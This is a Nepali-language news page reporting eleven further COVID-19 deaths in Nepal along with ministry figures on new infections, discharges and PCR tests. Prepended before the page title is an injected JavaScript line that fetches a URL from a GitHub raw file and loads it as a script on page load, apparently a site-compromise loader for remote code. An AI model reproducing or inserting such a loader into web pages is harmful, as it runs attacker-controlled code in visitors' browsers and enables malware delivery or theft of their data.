;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपालमा कोरोना संक्रमणबाट थप ११ जनाको मृत्यु – जुनेली न्युज
बिहिबार, असार १३, २०८२
  • होमपेज
  • नेपालमा कोरोना संक्रमणबाट थप ११ जनाको मृत्यु
समाचार

नेपालमा कोरोना संक्रमणबाट थप ११ जनाको मृत्यु

असोज १६,

काठमाडौं । नेपालमा कोरोना संक्रमणका कारण थप ११ जनाको मृत्यू भएको छ। स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डाक्टर जागेश्वर गौतमले नियमित पत्रकार सम्मेलनमा पछिल्लो २४ घण्टामा देशभर ११ जनाको मृत्यु भएको हो।

मृत्यु हुनेमा ४ महिला र ७ जना पुरुष रहेका छन्। योसँगै देशभर कोरोनाका कारण मृत्यु हुनेको संख्या ५ सय २० पुगेको छ। देशभर पछिल्लो २४ घण्टामा २ हजार ७ सय २२ कोरोना संक्रमित थपिएका छन्।

स्वास्थ्य तथा जनसंख्या मन्त्रालयले गरेको नियमित मिडिया ब्रिफिङमा पछिल्लो एक दिनमा हालसम्मकै धेरै ३ हजार ३ सय ७ संक्रमित डिस्चार्ज भएका छन्।

आजको पिसिआर १४ हजार ७ सय ३९ रहेको प्रवक्ता गौतमले जानकारी दिए। हाल देशभर २१ हजार २ सय ३४ सक्रिय संक्रमित रहेका छन्।

फेसबुक प्रतिक्रियाहरु